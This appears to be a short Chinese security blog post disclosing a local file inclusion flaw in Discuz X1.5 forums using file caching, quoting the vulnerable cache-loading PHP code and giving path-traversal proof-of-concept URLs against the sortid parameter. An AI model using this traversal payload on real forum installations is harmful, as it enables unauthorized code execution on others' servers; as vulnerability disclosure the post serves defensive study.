DISCUZ X1.5 本地文件包含漏洞
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
数据统计中,请稍等!
- 发表评论 欢迎您发表评论,强烈建议注册登陆后发表评论
-
- 最新评论 进入详细评论页>>
热门
- DZ X1.5后台漏洞拿shell及修复
- DISCUZ X1.5 本地文件包含漏洞
- DedeCms v5.6 嵌入恶意代码执行漏洞及修复
- php解决json_encode输出GB2312中文问题
- PHP中可以避免乱码的截取汉字
- php5 特性漏洞
- 安装PHP可能遇到的问题“无法载入mysql扩展”
- phpcms的另一个phpcms_auth函数的加密密钥AU
- PHP中可以避免乱码的截取汉字
- PHP截取汉字乱码问题解决方法
- php新窗口中get参数乱码
- 对韩国某CMS的一次安全检测
- php168 v6/v7鸡肋Getshell安全问题
- PHP168后台查看/修改任意文件漏洞
- Discuz!NT论坛多个文件变量过滤不严导致XSS攻击
